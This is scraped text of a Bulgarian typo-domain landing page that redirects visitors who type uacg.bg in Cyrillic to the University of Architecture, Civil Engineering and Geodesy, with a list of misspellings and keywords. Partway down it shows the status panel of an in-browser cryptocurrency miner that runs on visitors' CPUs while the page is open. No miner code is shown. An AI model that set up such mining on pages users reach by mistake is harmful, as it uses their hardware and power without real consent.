Пак тази кирилица ...

Вие виждате тази страница, защото вероятно сте написали
www.uacg.bg на кирилица!
Често този адрес се изписва така:

уацг

уацг.бг

ввв.уацг.бг

кьъж

кьъжлфж

ууулкьъжлфж

За да отворите страницата, просто щракнете върху нейния адрес

UACEG - University of Architecture, Civil Engineering and Geodesy

UACEG is the only civil institution in Bulgaria for education and training of architects, civil engineers and surveyors.

Отидете на ...

 
 Hash Rate / Sec Total Hashes Shares Found Shares Verfied
0
0
0
0
Thank you for supporting us by donating some of your CPU for finding some shares.
To stop mining, just leave this page. Nothing is installed on your computer.
Начало

uacg.bg misspellings: уацг уацг.бг ввв.уацг.бг кьъж кьъжлфж ууулкьъжлфж
uacg.bg keywords: bg bulgaria sofia education uaceg university architecture civil engineering geodesy architect engineer surveyor България София УАСГ образование наука университет архитектура строителство геодезия висше образование архитект строителе